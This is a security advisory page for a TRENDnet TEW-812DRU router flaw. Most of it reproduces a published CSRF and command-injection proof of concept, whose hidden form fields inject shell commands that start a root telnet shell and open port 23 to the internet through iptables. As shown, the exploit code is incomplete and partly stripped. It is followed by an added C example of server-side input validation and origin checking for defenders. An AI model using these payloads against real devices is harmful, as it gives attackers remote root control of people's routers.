812DRU Multiple Command Injection Vulnerabilities (CVE

Published: 2013-07-28
Updated: 2013-07-31

Affected systems:
TRENDnet TEW-812DRU
Description:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 61492
CVE(CAN) ID: CVE-2013-3365

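The TRENDnet TEW-812DRU is a dual-band wireless router.

The TRENDnet TEW-812DRU allows an attacker to execute arbitrary commands in the context of the affected device.

<*Source: Jacob Holcomb
  *>

Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!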

TRENDnet TEW-812DRU CSRF/Command Injection Root Exploit

EDB-ID: 27177    CVE: 2013-3098    OSVDB-ID: N/A
Author: Jacob Holcomb    Published: 2013-07-28    Verified: Not Verified
<html>
<head>
<title> TRENDnet TEW-812DRU CSRF - Command Injection > Shell Exploit.</title>
<!--
# CSRF Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators
# Command Injection(s) Discovered by: Jacob Holcomb & Kedy Liu - Security Analysts @ Independent Security Evaluators
# Exploited by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators
# CVE: CSRF - CVE-2013-3098 & Multiple Command Injection - CVE-2013-3365
#
#
-->
</head>
<body>
<img src="https://192.168.10.1/Images/logo.gif"><!--TRENDnet Logo for attack launch page -->
<h1>Please wait... </h1>
<script type="text/javascript">
//Request to enable port forwarding to the router's internal IP on port 23
//This exploit works without this request, but the exploit was more stable with it, so it's included in this PoC.
function RF1(){
    document.write('<form target ="_blank" action="http://192.168.10.1/uapply.cgi" method="post">'+
    '<input type="hidden" value="/advanced/single_port.asp">'+
    '<input type="hidden" value="0">'+
    '<input type="hidden" value="24">'+
    '<input type="hidden" value="tcp">'+
    '<input type="hidden" value="23">'+
    '<input type="hidden" value="23">'+
    '<input type="hidden" value="192.168.10.1">'+
    '<input type="hidden" value="23">'+
    '<input type="hidden" value="23">'+
    '<input type="hidden" value="0">'+
    '<input type="hidden" value="on">'+
    '<input tpye="hidden" value="Apply">'+
    '</form>');
}

//Request to enable telnet
function RF2(){
    document.write('<form target="_blank" action="http://192.168.10.1/setNTP.cgi" method="post">'+
    '<input type="hidden" value="/adm/time.asp">'+
    '<input type="hidden" value="on">'+
    '<input type="hidden" value="1">'+
    '<input type="hidden" value="`utelnetd -l /bin/sh`">'+
    '<input type="hidden" value="030102">'+
    '<input type="hidden" value="03">'+
    '<input type="hidden" value="01">'+
    '<input type="hidden" value="02">'+
    '<input type="hidden" value="100102">'+
    '<input type="hidden" value="10">'+
    '<input type="hidden" value="01">'+
    '<input type="hidden" value="02">'+
    '<input type="hidden" value="1">'+
    '<input type="hidden" value="pool.ntp.org">'+
    '<input type="hidden" value="UCT_-11">'+
    '<input type="hidden" value="300">'+
    '<input type="hidden" value="2012">'+
    '<input type="hidden" value="01">'+
    '<input type="hidden" value="01">'+
    '<input type="hidden" value="00">'+
    '<input type="hidden" value="19">'+
    '<input type="hidden" value="57">'+
    '<input type="hidden" value="manual">'+
    '</form>');
}

//Request to change iptables to allow port 23 from the WAN.
function RF3(){
    document.write(
    '<form target="_blank" action="http://192.168.10.1/setNTP.cgi" method="post">'+
    '<input type="hidden" value="/adm/time.asp">'+
    '<input type="hidden" value="on">'+
    '<input type="hidden" value="1">'+
    '<input type="hidden" value="3600">'+
    '<input type="hidden" value="030102">'+
    '<input type="hidden" value="03">'+
    '<input type="hidden" value="01">'+
    '<input type="hidden" value="02">'+
    '<input type="hidden" value="`count=0;while [ $count -le 25 ]; do iptables -I INPUT 1 -p tcp --dport 23 -j ACCEPT;(( count++ ));done;`">'+
    '<input type="hidden" value="10">'+
    '<input type="hidden" value="01">'+
    '<input type="hidden" value="02">'+
    '<input type="hidden" value="1">'+
    '<input type="hidden" value="pool.ntp.org">'+
    '<input type="hidden" value="UCT_-11">'+
    '<input type="hidden" value="300">'+
    '<input type="hidden" value="2012">'+
    '<input type="hidden" value="01">'+
    '<input type="hidden" value="01">'+
    '<input type="hidden" value="00">'+
    '<input type="hidden" value="19">'+
    '<input type="hidden" value="57">'+
    '<input type="hidden" value="manual">'+
    '</form>');
}
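
The forms above place backtick-wrapped shell text in fields that otherwise hold short numeric values such as "3600" and "100102", and they are submitted cross-site. The following is an added example, not code from the original advisory or from TRENDnet firmware: two server-side checks a CGI handler could apply before using such values. The function names, the field limits and the assumption that these fields are purely numeric are hypothetical; the origin `http://192.168.10.1` is the address used on this page.

```c
/* Added example, not TRENDnet firmware code; field roles are assumptions. */
#include <ctype.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>

/* Accept only 1..max_digits ASCII digits with a value in [min, max].
 * Returns 0 and stores the value on success, -1 on rejection. */
int parse_numeric_field(const char *s, size_t max_digits,
                        long min, long max, long *out)
{
    size_t i, n;
    long v;
    if (s == NULL || out == NULL)
        return -1;
    n = strlen(s);
    if (n == 0 || n > max_digits)
        return -1;
    for (i = 0; i < n; i++)
        if (!isdigit((unsigned char)s[i]))  /* rejects ` ; $ ( ) and spaces */
            return -1;
    errno = 0;
    v = strtol(s, NULL, 10);
    if (errno != 0 || v < min || v > max)
        return -1;
    *out = v;
    return 0;
}

/* CSRF check for state-changing POSTs: the Origin (or Referer) header must
 * be the device's own origin, ending there or continuing with '/'.
 * A missing header is rejected. Returns 1 if same-origin, else 0. */
int same_origin(const char *header, const char *own_origin)
{
    size_t n;
    if (header == NULL || own_origin == NULL)
        return 0;
    n = strlen(own_origin);
    if (strncmp(header, own_origin, n) != 0)
        return 0;
    return header[n] == '\0' || header[n] == '/';
}

int main(void)
{
    long v = 0;
    /* "3600" is the benign value seen in the page's form: accepted, exit 0. */
    return parse_numeric_field("3600", 6, 0, 999999, &v);
}
```

Validation of this kind belongs in the handler before a value reaches any command line; building the command as an argument vector rather than a shell string removes backtick interpretation altogether.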
